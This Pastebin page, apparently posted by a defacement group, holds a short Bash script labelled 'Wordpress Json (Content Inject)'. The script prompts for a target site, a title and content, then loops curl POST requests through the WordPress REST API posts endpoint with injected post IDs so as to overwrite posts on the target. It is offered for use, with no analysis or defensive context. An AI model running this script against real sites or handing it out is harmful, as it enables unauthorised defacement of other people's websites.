Advertisement
AZZATSSINS_CYBERSERK

Wordpress Json (Content Inject)

Dec 23rd, 2019
387
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.41 KB | None | 0 0
  1. #AZZATSSINS
  2. printf "\n>>>WORDPRESS CONTENT INJECTION\n\n"
  3. read -p "URL : " urlnya
  4. read -p "TITLE : " judulnya
  5. read -p "CONTENT : " isinya
  6. arry=(23004 22992 22978 22969 22958 22948 22933 22913 22891 22878)
  7.  
  8. for m in ${arry[@]}; do
  9. curl -X POST "$urlnya/index.php/wp-json/wp/v2/posts/42247" -H "Content-Type: application/json"  --data "{\"id\" : \"$m\",\"title\": \"$judulnya\",\"content\": \"$isinya\"}" e
  10. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement